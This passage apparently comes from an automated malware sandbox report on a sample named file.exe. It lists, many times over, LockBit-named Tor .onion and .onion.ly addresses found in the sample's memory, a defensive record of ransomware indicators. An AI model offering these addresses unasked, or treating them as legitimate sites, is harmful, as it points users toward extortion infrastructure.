            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
            Source: file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly
            Source: file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly
